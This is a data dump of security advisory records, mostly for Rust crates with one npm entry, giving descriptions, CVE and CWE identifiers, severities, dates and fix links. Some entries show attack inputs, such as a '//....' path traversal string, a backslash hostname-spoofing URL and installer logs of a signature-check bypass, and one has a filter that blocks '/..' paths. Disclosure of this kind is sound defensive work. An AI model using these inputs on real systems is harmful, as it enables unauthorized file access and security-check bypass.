Affected versions of this crate suffered from an integer overflow bug when calculating the size of a buffer to use when encoding base64 using the `encode_config_buf` and `encode_config` functions. If the input string was large, this would cause a buffer to be allocated that was too small. Since this function writes to the buffer using unsafe code, it would allow an attacker to write beyond the buffer, causing memory corruption and possibly the execution of arbitrary code. This flaw was corrected by using checked arithmetic to calculate the size of the buffer.
{'CVE-2017-1000430'}
2021-08-19T17:02:46Z
2021-08-25T20:55:27Z
CRITICAL
null
{'CWE-119'}
{'https://rustsec.org/advisories/RUSTSEC-2017-0004', 'https://nvd.nist.gov/vuln/detail/CVE-2017-1000430', 'https://github.com/alicemaz/rust-base64/commit/24ead980daf11ba563e4fb2516187a56a71ad319', 'https://github.com/alicemaz/rust-base64'}
null
{'https://github.com/alicemaz/rust-base64/commit/24ead980daf11ba563e4fb2516187a56a71ad319'}
{'https://github.com/alicemaz/rust-base64/commit/24ead980daf11ba563e4fb2516187a56a71ad319'}
crates.io
GHSA-3w8g-xr3f-2mp8
Out of bounds write in nalgebra
The `Deserialize` implementation for `VecStorage` did not maintain the invariant that the number of elements must equal `nrows * ncols`. Deserialization of specially crafted inputs could allow memory access beyond allocation of the vector. This flaw was introduced in v0.11.0 ([`086e6e`](https://github.com/dimforge/nalgebra/commit/086e6e719f53fecba6dadad2e953a487976387f5)) due to the addition of an automatically derived implementation of `Deserialize` for `MatrixVec`. `MatrixVec` was later renamed to `VecStorage` in v0.16.13 ([`0f66403`](https://github.com/dimforge/nalgebra/commit/0f66403cbbe9eeac15cedd8a906c0d6a3d8841f2)) and continued to use the automatically derived implementation of `Deserialize`.
{'CVE-2021-38190'}
2021-08-24T18:08:59Z
2021-08-25T20:55:49Z
CRITICAL
null
{'CWE-787', 'CWE-119'}
{'https://github.com/dimforge/nalgebra/issues/883', 'https://github.com/dimforge/nalgebra/blob/dev/CHANGELOG.md#0270', 'https://nvd.nist.gov/vuln/detail/CVE-2021-38190', 'https://github.com/dimforge/nalgebra/commit/a803271fcce75b7c151e92aa099dfa546db4adc5', 'https://github.com/dimforge/nalgebra/pull/889', 'https://rustsec.org/advisories/RUSTSEC-2021-0070.html', 'https://github.com/dimforge/nalgebra'}
null
{'https://github.com/dimforge/nalgebra/commit/a803271fcce75b7c151e92aa099dfa546db4adc5'}
{'https://github.com/dimforge/nalgebra/commit/a803271fcce75b7c151e92aa099dfa546db4adc5'}
crates.io
GHSA-m5pq-gvj9-9vr8
Regular expression denial of service in Rust's regex crate
> This is a cross-post of [the official security advisory][advisory]. The official advisory contains a signed version with our PGP key, as well. [advisory]: https://groups.google.com/g/rustlang-security-announcements/c/NcNNL1Jq7Yw The Rust Security Response WG was notified that the `regex` crate did not properly limit the complexity of the regular expressions (regex) it parses. An attacker could use this security issue to perform a denial of service, by sending a specially crafted regex to a service accepting untrusted regexes. No known vulnerability is present when parsing untrusted input with trusted regexes. This issue has been assigned CVE-2022-24713. The severity of this vulnerability is "high" when the `regex` crate is used to parse untrusted regexes. Other uses of the `regex` crate are not affected by this vulnerability. ## Overview The `regex` crate features built-in mitigations to prevent denial of service attacks caused by untrusted regexes, or untrusted input matched by trusted regexes. Those (tunable) mitigations already provide sane defaults to prevent attacks. This guarantee is documented and it's considered part of the crate's API. Unfortunately a bug was discovered in the mitigations designed to prevent untrusted regexes to take an arbitrary amount of time during parsing, and it's possible to craft regexes that bypass such mitigations. This makes it possible to perform denial of service attacks by sending specially crafted regexes to services accepting user-controlled, untrusted regexes. ## Affected versions All versions of the `regex` crate before or equal to 1.5.4 are affected by this issue. The fix is include starting from `regex` 1.5.5. ## Mitigations We recommend everyone accepting user-controlled regexes to upgrade immediately to the latest version of the `regex` crate. Unfortunately there is no fixed set of problematic regexes, as there are practically infinite regexes that could be crafted to exploit this vulnerability. Because of this, we do not recommend denying known problematic regexes. ## Acknowledgements We want to thank Addison Crump for responsibly disclosing this to us according to the [Rust security policy](https://www.rust-lang.org/policies/security), and for helping review the fix. We also want to thank Andrew Gallant for developing the fix, and Pietro Albini for coordinating the disclosure and writing this advisory.
{'CVE-2022-24713'}
2022-03-11T19:58:44Z
2022-03-08T20:00:36Z
HIGH
null
{'CWE-400'}
{'https://www.debian.org/security/2022/dsa-5113', 'https://nvd.nist.gov/vuln/detail/CVE-2022-24713', 'https://github.com/rust-lang/regex/security/advisories/GHSA-m5pq-gvj9-9vr8', 'https://lists.debian.org/debian-lts-announce/2022/04/msg00009.html', 'https://groups.google.com/g/rustlang-security-announcements/c/NcNNL1Jq7Yw', 'https://github.com/rust-lang/regex/commit/ae70b41d4f46641dbc45c7a4f87954aea356283e', 'https://lists.debian.org/debian-lts-announce/2022/04/msg00003.html', 'https://www.debian.org/security/2022/dsa-5118', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PDOWTHNVGBOP2HN27PUFIGRYNSNDTYRJ/', 'https://github.com/rust-lang/regex/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O3YB7CURSG64CIPCDPNMGPE4UU24AB6H/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JANLZ3JXWJR7FSHE57K66UIZUIJZI67T/'}
null
{'https://github.com/rust-lang/regex/commit/ae70b41d4f46641dbc45c7a4f87954aea356283e'}
{'https://github.com/rust-lang/regex/commit/ae70b41d4f46641dbc45c7a4f87954aea356283e'}
crates.io
GHSA-3cgf-9m6x-pwwr
Data races in rusqlite
An issue was discovered in the rusqlite crate before 0.23.0 for Rust. Memory safety can be violated via UnlockNotification.
{'CVE-2020-35868'}
2021-08-19T21:08:22Z
2021-08-25T20:47:50Z
CRITICAL
null
{'CWE-362'}
{'https://github.com/rusqlite/rusqlite/releases/tag/0.23.0', 'https://github.com/rusqlite/rusqlite', 'https://github.com/rusqlite/rusqlite/commit/45fd77ee43c38eea4d6f4e2e56c1667a55ec654f', 'https://rustsec.org/advisories/RUSTSEC-2020-0014.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-35868'}
null
{'https://github.com/rusqlite/rusqlite/commit/45fd77ee43c38eea4d6f4e2e56c1667a55ec654f'}
{'https://github.com/rusqlite/rusqlite/commit/45fd77ee43c38eea4d6f4e2e56c1667a55ec654f'}
crates.io
GHSA-h6xw-mghq-7523
Unsafe parsing in SWHKD
SWHKD 1.1.5 allows unsafe parsing via the -c option. An information leak might occur but there is a simple denial of service (memory exhaustion) upon an attempt to parse a large or infinite file (such as a block or character device).
{'CVE-2022-27819'}
2022-04-15T16:14:51Z
2022-04-08T00:00:24Z
MODERATE
null
{'CWE-400'}
{'http://www.openwall.com/lists/oss-security/2022/04/14/1', 'https://github.com/waycrate/swhkd/commit/b4e6dc76f4845ab03104187a42ac6d1bbc1e0021', 'https://github.com/waycrate/swhkd', 'https://github.com/waycrate/swhkd/releases', 'https://nvd.nist.gov/vuln/detail/CVE-2022-27819', 'https://github.com/waycrate/swhkd/releases/tag/1.1.7'}
null
{'https://github.com/waycrate/swhkd/commit/b4e6dc76f4845ab03104187a42ac6d1bbc1e0021'}
{'https://github.com/waycrate/swhkd/commit/b4e6dc76f4845ab03104187a42ac6d1bbc1e0021'}
crates.io
GHSA-3r3g-g73x-g593
Improper Verification of Cryptographic Signature in coreos
### Impact coreos-installer fails to correctly verify GPG signatures when decompressing gzip-compressed artifacts. This allows bypass of signature verification in cases where coreos-installer decompresses a downloaded OS image, allowing an attacker who can modify the OS image to compromise a newly-installed system. Default installations from ISO or PXE media in Fedora CoreOS, RHEL CoreOS, and RHEL for Edge are **not** affected, as coreos-installer installs from an OS image shipped as part of the install media. These flows are affected: 1. Installing with `--image-file`, `--image-url`, or `coreos.inst.image_url`. For example, if a user has a local mirror of installation images, an attacker could replace an image with a gzip-compressed alternative (even if the file extension is `.xz`). The result: ``` $ coreos-installer install --image-url http://localhost:8080/image.xz /dev/loop0 Downloading image from http://localhost:8080/image.xz Downloading signature from http://localhost:8080/image.xz.sig > Read disk 749.9 MiB/749.9 MiB (100%) gpg: Signature made Mon 20 Sep 2021 02:41:50 PM EDT gpg: using RSA key 8C5BA6990BDB26E19F2A1A801161AE6945719A39 gpg: BAD signature from "Fedora (34) <fedora-34-primary@fedoraproject.org>" [ultimate] Install complete. ``` Notice that GPG reports a bad signature, but coreos-installer continues anyway. Automation that relies on coreos-installer's exit status will not notice either. 2. `coreos-installer download --decompress --image-url`: ``` $ coreos-installer download --decompress --image-url http://localhost:8080/image.xz > Read disk 749.9 MiB/749.9 MiB (100%) gpg: Signature made Mon 20 Sep 2021 02:41:50 PM EDT gpg: using RSA key 8C5BA6990BDB26E19F2A1A801161AE6945719A39 gpg: BAD signature from "Fedora (34) <fedora-34-primary@fedoraproject.org>" [ultimate] ./image ``` Again, coreos-installer reports success. 3. Installing with default parameters, when **not** installing from the image built into live ISO or PXE media, if the hosting service is compromised or if an active attacker gains control of the HTTPS response. 4. `coreos-installer download --decompress` if the hosting service is compromised or if an active attacker gains control of the HTTPS response. ### Patches The vulnerability is [fixed](https://github.com/coreos/coreos-installer/pull/659) in coreos-installer 0.10.1. ### Workarounds For `coreos-installer download`, do not use the `-d` or `--decompress` options. For `coreos-installer install`, manually inspect the stderr output. If `BAD signature` appears, do not boot from the target disk. Note, however, that some OS services may have already accessed data on the compromised disk. ### References For more information, see [PR 655](https://github.com/coreos/coreos-installer/pull/655). ### For more information If you have any questions or comments about this advisory, [open an issue in coreos-installer](https://github.com/coreos/coreos-installer/issues/new/choose) or email the CoreOS [development mailing list](https://lists.fedoraproject.org/archives/list/coreos@lists.fedoraproject.org/).
{'CVE-2021-20319'}
2022-03-15T00:15:58Z
2021-10-12T16:06:47Z
HIGH
null
{'CWE-347'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-20319', 'https://bugzilla.redhat.com/show_bug.cgi?id=2011862', 'https://github.com/coreos/coreos-installer/pull/655', 'https://github.com/coreos/coreos-installer/pull/659/commits/ad243c6f0eff2835b2da56ca5f7f33af76253c89', 'https://github.com/coreos/coreos-installer/security/advisories/GHSA-3r3g-g73x-g593', 'https://github.com/coreos/coreos-installer'}
null
{'https://github.com/coreos/coreos-installer/pull/659/commits/ad243c6f0eff2835b2da56ca5f7f33af76253c89'}
{'https://github.com/coreos/coreos-installer/pull/659/commits/ad243c6f0eff2835b2da56ca5f7f33af76253c89'}
crates.io
GHSA-862g-9h5m-m3qv
coreos-installer < 0.10.0 writes world-readable Ignition config to installed system
### Impact On systems installed with coreos-installer before 0.10.0, the user-provided Ignition config was written to `/boot/ignition/config.ign` with world-readable permissions, granting unprivileged users access to any secrets included in the config. Default configurations of Fedora CoreOS and RHEL CoreOS do not include any unprivileged user accounts. In addition, instances launched from a cloud image, and systems provisioned with the `ignition.config.url` kernel argument, do not use the `config.ign` file and are unaffected. ### Patches coreos-installer 0.10.0 and later [writes](https://github.com/coreos/coreos-installer/pull/571) the Ignition config with restricted permissions. ### Workarounds On Fedora CoreOS systems installed from version 34.20210711.3.0 (stable), 34.20210711.2.0 (testing), 34.20210711.1.1 (next) and later, the `/boot/ignition` directory and its contents are removed after provisioning is complete. All Fedora CoreOS systems that have updated to these versions or later have automatically removed the `/boot/ignition` directory and no action is required. On other systems, `/boot/ignition/config.ign` can be removed manually, as it is not used after provisioning is complete: ``` sudo mount -o remount,rw /boot sudo rm -rf /boot/ignition ``` ### References For more information, see https://github.com/coreos/fedora-coreos-tracker/issues/889. ### For more information If you have any questions or comments about this advisory, [open an issue in coreos-installer](https://github.com/coreos/coreos-installer/issues/new/choose) or email the CoreOS [development mailing list](https://lists.fedoraproject.org/archives/list/coreos@lists.fedoraproject.org/).
{'CVE-2021-3917'}
2021-11-04T17:11:09Z
2021-11-08T18:01:13Z
LOW
null
null
{'https://github.com/coreos/coreos-installer/', 'https://github.com/coreos/coreos-installer/releases/tag/v0.10.0', 'https://github.com/coreos/coreos-installer/security/advisories/GHSA-862g-9h5m-m3qv', 'https://github.com/coreos/coreos-installer/commit/2a36405339c87b16ed6c76e91ad5b76638fbdb0c'}
null
{'https://github.com/coreos/coreos-installer/commit/2a36405339c87b16ed6c76e91ad5b76638fbdb0c'}
{'https://github.com/coreos/coreos-installer/commit/2a36405339c87b16ed6c76e91ad5b76638fbdb0c'}
crates.io
GHSA-686h-j8r8-wmfm
Data races in rcu_cell
Affected versions of this crate unconditionally implement Send/Sync for `RcuCell<T>`. This allows users to send `T: !Send` to other threads (while `T` enclosed within `RcuCell<T>`), and allows users to concurrently access `T: !Sync` by using the APIs of `RcuCell<T>` that provide access to `&T`. This can result in memory corruption caused by data races.
{'CVE-2020-36451'}
2021-08-24T17:53:47Z
2021-08-25T20:57:14Z
HIGH
null
{'CWE-77', 'CWE-362'}
{'https://github.com/Xudong-Huang/rcu_cell', 'https://rustsec.org/advisories/RUSTSEC-2020-0131.html', 'https://github.com/Xudong-Huang/rcu_cell/pull/4', 'https://github.com/Xudong-Huang/rcu_cell/issues/3', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36451', 'https://github.com/Xudong-Huang/rcu_cell/pull/4/commits/1faf18eee11f14969b77ae0f76dcd9ebd437d0c2'}
null
{'https://github.com/Xudong-Huang/rcu_cell/pull/4/commits/1faf18eee11f14969b77ae0f76dcd9ebd437d0c2'}
{'https://github.com/Xudong-Huang/rcu_cell/pull/4/commits/1faf18eee11f14969b77ae0f76dcd9ebd437d0c2'}
crates.io
GHSA-p4jg-pccf-h82c
Insecure Temporary File in SWHKD
SWHKD is a display protocol-independent hotkey daemon made in Rust. In SWHKD versions 1.1.5 and prior, SWHKD uses the /tmp/swhkd.pid pathname. As /tmp is accessible to all users, there can be an information leak or denial of service. No known workarounds exist. A patch is available on the `1.1.0` branch of the repository.
{'CVE-2022-27815'}
2022-04-06T23:57:05Z
2022-03-31T00:00:24Z
CRITICAL
null
{'CWE-377'}
{'https://github.com/waycrate/swhkd/commit/e661a4940df78fbb7b52c622ac4ae6a3a7f7d8aa', 'http://www.openwall.com/lists/oss-security/2022/04/14/1', 'https://nvd.nist.gov/vuln/detail/CVE-2022-27815', 'https://github.com/waycrate/swhkd', 'https://github.com/waycrate/swhkd/releases'}
null
{'https://github.com/waycrate/swhkd/commit/e661a4940df78fbb7b52c622ac4ae6a3a7f7d8aa'}
{'https://github.com/waycrate/swhkd/commit/e661a4940df78fbb7b52c622ac4ae6a3a7f7d8aa'}
crates.io
RUSTSEC-2018-0016
quickersort is deprecated and unmaintained
The author of the `quickersort` crate has deprecated it and does not recommend using it anymore. Everything in it has been incorporated into [std::sort_unstable] in the standard library as of Rust 1.20. [std::sort_unstable]: https://doc.rust-lang.org/stable/std/primitive.slice.html#method.sort_unstable
null
2020-10-02T01:29:11Z
2018-06-30T12:00:00Z
null
null
null
{'https://rustsec.org/advisories/RUSTSEC-2018-0016.html', 'https://github.com/notriddle/quickersort/commit/0bc164366315801f0c6b31f4081b7df9fc894076', 'https://crates.io/crates/quickersort'}
null
{'https://github.com/notriddle/quickersort/commit/0bc164366315801f0c6b31f4081b7df9fc894076'}
{'https://github.com/notriddle/quickersort/commit/0bc164366315801f0c6b31f4081b7df9fc894076'}
crates.io
RUSTSEC-2017-0004
Integer overflow leads to heap-based buffer overflow in encode_config_buf
Affected versions of this crate suffered from an integer overflow bug when calculating the size of a buffer to use when encoding base64 using the `encode_config_buf` and `encode_config` functions. If the input string was large, this would cause a buffer to be allocated that was too small. Since this function writes to the buffer using unsafe code, it would allow an attacker to write beyond the buffer, causing memory corruption and possibly the execution of arbitrary code. This flaw was corrected by using checked arithmetic to calculate the size of the buffer.
{'CVE-2017-1000430'}
2021-10-19T22:14:35Z
2017-05-03T12:00:00Z
null
null
null
{'https://crates.io/crates/base64', 'https://rustsec.org/advisories/RUSTSEC-2017-0004.html', 'https://github.com/alicemaz/rust-base64/commit/24ead980daf11ba563e4fb2516187a56a71ad319'}
null
{'https://github.com/alicemaz/rust-base64/commit/24ead980daf11ba563e4fb2516187a56a71ad319'}
{'https://github.com/alicemaz/rust-base64/commit/24ead980daf11ba563e4fb2516187a56a71ad319'}
crates.io
GHSA-6q5w-m3c5-rv95
Data races in rusqlite
An issue was discovered in the rusqlite crate before 0.23.0 for Rust. Memory safety can be violated via VTab / VTabCursor.
{'CVE-2020-35866'}
2021-08-19T21:08:01Z
2021-08-25T20:47:59Z
CRITICAL
null
{'CWE-362'}
{'https://github.com/rusqlite/rusqlite/releases/tag/0.23.0', 'https://github.com/rusqlite/rusqlite', 'https://nvd.nist.gov/vuln/detail/CVE-2020-35866', 'https://rustsec.org/advisories/RUSTSEC-2020-0014.html', 'https://github.com/rusqlite/rusqlite/commit/c9ef5bd63cad5c0c123344c072b490a1a9bcbe1f'}
null
{'https://github.com/rusqlite/rusqlite/commit/c9ef5bd63cad5c0c123344c072b490a1a9bcbe1f'}
{'https://github.com/rusqlite/rusqlite/commit/c9ef5bd63cad5c0c123344c072b490a1a9bcbe1f'}
crates.io
GHSA-3227-r97m-8j95
Relative Path Traversal in afire serve_static
### Impact This vulnerability effects the built-in afire serve_static extension allowing paths containing `//....` to bypass the previous path sanitation and request files in higher directories that should not be accessible. ### Patches The issue has been fixed in [afire 1.1.0](https://crates.io/crates/afire/1.1.0). If you can, just update to the newest version of afire. ### Workarounds If you can't update afire you can simply disallow paths containing `/..` with the following middleware. Make sure this is the last middleware added to the server so it runs first, stopping the bad requests. ```rust use afire::prelude::*; struct PathTraversalFix; impl Middleware for PathTraversalFix { fn pre(&self, req: Request) -> MiddleRequest { if req.path.replace("\\", "/").contains("/..") { return MiddleRequest::Send( Response::new() .status(400) .text("Paths containing `..` are not allowed"), ); } MiddleRequest::Continue } } ``` ```rust let mut server = Server::new(host, port); PathTraversalFix.attach(&mut server); ``` ### References You can read about the new changes to afire in 1.1.0 [here](https://connorcode.com/writing/afire/update-3) ### For more information If you have any questions or comments about this advisory you can email me or message me on discord. [[https://connorcode.com/contact](https://connorcode.com/contact)]
null
2022-04-22T20:16:45Z
2022-04-22T20:16:45Z
HIGH
null
{'CWE-34', 'CWE-22'}
{'https://github.com/Basicprogrammer10/afire', 'https://github.com/Basicprogrammer10/afire/releases/tag/v1.1.0', 'https://github.com/Basicprogrammer10/afire/commit/da7904c04f82e1cb43cc42eaf6a1dba072b5c921', 'https://github.com/Basicprogrammer10/afire/security/advisories/GHSA-3227-r97m-8j95'}
null
{'https://github.com/Basicprogrammer10/afire/commit/da7904c04f82e1cb43cc42eaf6a1dba072b5c921'}
{'https://github.com/Basicprogrammer10/afire/commit/da7904c04f82e1cb43cc42eaf6a1dba072b5c921'}
crates.io
GHSA-w5cr-frph-hw7f
Use of uninitialized buffer in rkyv
An issue was discovered in the rkyv crate before 0.6.0 for Rust. When an archive is created via serialization, the archive content may contain uninitialized values of certain parts of a struct.
{'CVE-2021-31919'}
2021-05-25T20:52:53Z
2021-08-25T21:01:50Z
HIGH
null
{'CWE-908'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-31919', 'https://github.com/djkoloski/rkyv/commit/f141b560523a20557db6540576d153010bd18712', 'https://github.com/djkoloski/rkyv/commit/9c65ae9c2c67dd949b5c3aba9b8eba6da802ab7e', 'https://rustsec.org/advisories/RUSTSEC-2021-0054.html'}
null
{'https://github.com/djkoloski/rkyv/commit/9c65ae9c2c67dd949b5c3aba9b8eba6da802ab7e', 'https://github.com/djkoloski/rkyv/commit/f141b560523a20557db6540576d153010bd18712'}
{'https://github.com/djkoloski/rkyv/commit/9c65ae9c2c67dd949b5c3aba9b8eba6da802ab7e', 'https://github.com/djkoloski/rkyv/commit/f141b560523a20557db6540576d153010bd18712'}
crates.io
GHSA-8m49-2xj8-67v9
Data Loss/Denial of Service in SWHKD
SWHKD 1.1.5 unsafely uses the /tmp/swhks.pid pathname. There can be data loss or a denial of service. A patch is available on the `1.1.0` branch of the repository.
{'CVE-2022-27816'}
2022-04-28T18:02:03Z
2022-03-31T00:00:24Z
HIGH
null
{'CWE-59'}
{'https://github.com/waycrate/swhkd/commit/0b620a09605afb815c6d8d8953bbb7a10a8c0575', 'https://nvd.nist.gov/vuln/detail/CVE-2022-27816', 'https://github.com/waycrate/swhkd', 'http://www.openwall.com/lists/oss-security/2022/04/14/1'}
null
{'https://github.com/waycrate/swhkd/commit/0b620a09605afb815c6d8d8953bbb7a10a8c0575'}
{'https://github.com/waycrate/swhkd/commit/0b620a09605afb815c6d8d8953bbb7a10a8c0575'}
crates.io
GHSA-5q2r-92f9-4m49
Improper verification of signature threshold in tough
## Impact The tough library, prior to 0.7.1, does not properly verify the uniqueness of keys in the signatures provided to meet the threshold of cryptographic signatures. It allows someone with access to a valid signing key to create multiple valid signatures in order to circumvent TUF requiring a minimum threshold of unique keys before the metadata is considered valid. AWS would like to thank Erick Tryzelaar of the Google Fuchsia Team for reporting this issue. ## Patches A fix is available in version 0.7.1. ## Workarounds No workarounds to this issue are known. ## References CVE-2020-6174 is assigned to the same issue in the TUF reference implementation. https://github.com/theupdateframework/tuf/pull/974 https://nvd.nist.gov/vuln/detail/CVE-2020-6174 ## For more information If you have any questions or comments about this advisory, [contact AWS Security](https://aws.amazon.com/security/vulnerability-reporting/) at [aws-security@amazon.com](mailto:aws-security@amazon.com).
{'CVE-2020-15093'}
2021-10-27T17:03:38Z
2021-08-25T20:56:55Z
HIGH
null
{'CWE-347'}
{'https://github.com/awslabs/tough', 'https://rustsec.org/advisories/RUSTSEC-2020-0024.html', 'https://github.com/awslabs/tough/security/advisories/GHSA-5q2r-92f9-4m49', 'https://github.com/theupdateframework/tuf/commit/2977188139d065ff3356c3cb4aec60c582b57e0e', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15093', 'https://github.com/theupdateframework/tuf/pull/974'}
null
{'https://github.com/theupdateframework/tuf/commit/2977188139d065ff3356c3cb4aec60c582b57e0e'}
{'https://github.com/theupdateframework/tuf/commit/2977188139d065ff3356c3cb4aec60c582b57e0e'}
crates.io
GHSA-r56q-vv3c-6g9c
Improper sanitization of delegated role names
### Impact The tough library, prior to 0.12.0, does not properly sanitize delegated role names when caching a repository, or when loading a repository from the filesystem. When the repository is cached or loaded, files ending with the .json extension could be overwritten with role metadata anywhere on the system. AWS would like to thank https://github.com/jku for reporting this issue. ### Patches A fix is available in version 0.12.0. ### Workarounds No workarounds to this issue are known. ### References https://github.com/theupdateframework/python-tuf/security/advisories/GHSA-wjw6-2cqr-j4qr
{'CVE-2021-41150'}
2021-10-19T18:06:09Z
2021-10-19T20:16:26Z
HIGH
null
{'CWE-22'}
{'https://github.com/awslabs/tough', 'https://github.com/theupdateframework/python-tuf/security/advisories/GHSA-wjw6-2cqr-j4qr ', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41150', 'https://github.com/awslabs/tough/commit/1809b9bd1106d78a51fbea3071aa97a3530bac9a', 'https://github.com/awslabs/tough/security/advisories/GHSA-r56q-vv3c-6g9c'}
null
{'https://github.com/awslabs/tough/commit/1809b9bd1106d78a51fbea3071aa97a3530bac9a'}
{'https://github.com/awslabs/tough/commit/1809b9bd1106d78a51fbea3071aa97a3530bac9a'}
crates.io
GHSA-cjg2-2fjg-fph4
Integer underflow in Frontier
### Impact A bug in Frontier's MODEXP precompile implementation can cause an integer underflow in certain conditions. This will cause a node crash for debug builds. For release builds (and production WebAssembly binaries), the impact is limited as it can only cause a normal EVM out-of-gas. It is recommended that you apply the patch as soon as possible. If you do not use MODEXP precompile in your runtime, then you are not impacted. ### Patches Patches are applied in PR #549. ### Workarounds None. ### References Patch PR: #549 ### Credits Thanks to SR-Labs for discovering the security vulnerability, and thanks to PureStake team for the patches. ### For more information If you have any questions or comments about this advisory: * Open an issue in the [Frontier repo](https://github.com/paritytech/frontier)
{'CVE-2022-21685'}
2022-01-14T19:58:51Z
2022-01-14T21:03:36Z
MODERATE
null
{'CWE-191'}
{'https://github.com/paritytech/frontier/commit/8a93fdc6c9f4eb1d2f2a11b7ff1d12d70bf5a664', 'https://github.com/paritytech/frontier/pull/549', 'https://github.com/paritytech/frontier/security/advisories/GHSA-cjg2-2fjg-fph4', 'https://nvd.nist.gov/vuln/detail/CVE-2022-21685', 'https://github.com/paritytech/frontier'}
null
{'https://github.com/paritytech/frontier/commit/8a93fdc6c9f4eb1d2f2a11b7ff1d12d70bf5a664'}
{'https://github.com/paritytech/frontier/commit/8a93fdc6c9f4eb1d2f2a11b7ff1d12d70bf5a664'}
crates.io
GHSA-vj62-g63v-f8mf
Validity check missing in Frontier
### Impact In the newly introduced signed Frontier-specific extrinsic for `pallet-ethereum`, a large part of transaction validation logic was only called in transaction pool validation, but not in block execution. Malicious validators can take advantage of this to put invalid transactions into a block. The attack is limited in that the signature is always validated, and the majority of the validation is done again in the subsequent `pallet-evm` execution logic. However, do note that a chain ID replay attack was possible. In addition, spamming attacks are of main concerns, while they are limited by Substrate block size limits and other factors. ### Patches The issue is patched in commit 146bb48849e5393004be5c88beefe76fdf009aba. ### References Patch PR: https://github.com/paritytech/frontier/pull/495 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Frontier repo](https://github.com/paritytech/frontier/issues) ### Special thanks Special thanks to @librelois, @nanocryk and the Moonbeam team for reporting and fixing this security vulnerability.
{'CVE-2021-41138'}
2021-10-13T17:34:31Z
2021-10-13T18:53:38Z
MODERATE
null
{'CWE-20'}
{'https://github.com/paritytech/frontier/pull/495', 'https://github.com/paritytech/frontier/commit/146bb48849e5393004be5c88beefe76fdf009aba', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41138', 'https://github.com/paritytech/frontier/pull/497', 'https://github.com/paritytech/frontier/security/advisories/GHSA-vj62-g63v-f8mf', 'https://github.com/paritytech/frontier'}
null
{'https://github.com/paritytech/frontier/commit/146bb48849e5393004be5c88beefe76fdf009aba'}
{'https://github.com/paritytech/frontier/commit/146bb48849e5393004be5c88beefe76fdf009aba'}
crates.io
GHSA-x3r5-q6mj-m485
Improper sanitization of target names
### Impact The tough library, prior to 0.12.0, does not properly sanitize target names when caching a repository, or when saving specific targets to an output directory. When targets are cached or saved, files could be overwritten with arbitrary content anywhere on the system. AWS would like to thank https://github.com/jku for reporting this issue. ### Patches A fix is available in version 0.12.0. ### Workarounds No workarounds to this issue are known.
{'CVE-2021-41149'}
2021-10-19T18:04:34Z
2021-10-19T20:16:15Z
HIGH
null
{'CWE-22'}
{'https://github.com/awslabs/tough', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41149', 'https://github.com/awslabs/tough/commit/1809b9bd1106d78a51fbea3071aa97a3530bac9a', 'https://github.com/awslabs/tough/security/advisories/GHSA-x3r5-q6mj-m485'}
null
{'https://github.com/awslabs/tough/commit/1809b9bd1106d78a51fbea3071aa97a3530bac9a'}
{'https://github.com/awslabs/tough/commit/1809b9bd1106d78a51fbea3071aa97a3530bac9a'}
crates.io
RUSTSEC-2021-0134
rental is unmaintained, author has moved on
The author encourages users to explore other solutions, or maintain a fork. Maintained alternatives include: * [`ouroboros`](https://crates.io/crates/ouroboros) * [`fortify`](https://crates.io/crates/fortify) * [`escher`](https://crates.io/crates/escher)
null
2022-03-06T11:02:04Z
2021-12-27T12:00:00Z
null
null
null
{'https://github.com/jpernst/rental/commit/213671ab3aab3452efd7e2290c6bb714ee327014', 'https://rustsec.org/advisories/RUSTSEC-2021-0134.html', 'https://crates.io/crates/rental'}
null
{'https://github.com/jpernst/rental/commit/213671ab3aab3452efd7e2290c6bb714ee327014'}
{'https://github.com/jpernst/rental/commit/213671ab3aab3452efd7e2290c6bb714ee327014'}
crates.io
GHSA-r3r5-jhw6-4634
Insecure temporary file usage in SWHKD
SWHKD 1.1.5 unsafely uses the /tmp/swhkd.sock pathname. There can be an information leak or denial of service.
{'CVE-2022-27818'}
2022-04-19T18:16:59Z
2022-04-08T00:00:24Z
CRITICAL
null
{'CWE-668'}
{'https://nvd.nist.gov/vuln/detail/CVE-2022-27818', 'https://github.com/waycrate/swhkd/commit/f70b99dd575fab79d8a942111a6980431f006818', 'http://www.openwall.com/lists/oss-security/2022/04/14/1', 'https://github.com/waycrate/swhkd', 'https://github.com/waycrate/swhkd/releases', 'https://github.com/waycrate/swhkd/releases/tag/1.1.7'}
null
{'https://github.com/waycrate/swhkd/commit/f70b99dd575fab79d8a942111a6980431f006818'}
{'https://github.com/waycrate/swhkd/commit/f70b99dd575fab79d8a942111a6980431f006818'}
crates.io
RUSTSEC-2020-0016
`net2` crate has been deprecated; use `socket2` instead
The [`net2`](https://crates.io/crates/net2) crate has been deprecated and users are encouraged to considered [`socket2`](https://crates.io/crates/socket2) instead.
null
2020-10-02T01:29:11Z
2020-05-01T12:00:00Z
null
null
null
{'https://github.com/deprecrated/net2-rs/commit/3350e3819adf151709047e93f25583a5df681091', 'https://crates.io/crates/net2', 'https://rustsec.org/advisories/RUSTSEC-2020-0016.html'}
null
{'https://github.com/deprecrated/net2-rs/commit/3350e3819adf151709047e93f25583a5df681091'}
{'https://github.com/deprecrated/net2-rs/commit/3350e3819adf151709047e93f25583a5df681091'}
npm
GHSA-p6j9-7xhc-rhwp
Hostname spoofing via backslashes in URL
### Impact If using affected versions to determine a URL's hostname, the hostname can be spoofed by using a backslash (`\`) character as part of the scheme delimiter, e.g. `scheme:/\hostname`. If the hostname is used in security decisions, the decision may be incorrect. Depending on library usage and attacker intent, impacts may include allow/block list bypasses, SSRF attacks, open redirects, or other undesired behavior. Example URL: `https:/\expected-example.com/path` Escaped string: `https:/\\expected-example.com/path` (JavaScript strings must escape backslash) Affected versions incorrectly return no hostname. Patched versions correctly return `expected-example.com`. Patched versions match the behavior of other parsers which implement the [WHATWG URL specification](https://url.spec.whatwg.org/), including web browsers and [Node's built-in URL class](https://nodejs.org/api/url.html). ### Patches Version 1.19.6 is patched against all known payload variants. ### References https://github.com/medialize/URI.js/releases/tag/v1.19.6 (fix for this particular bypass) 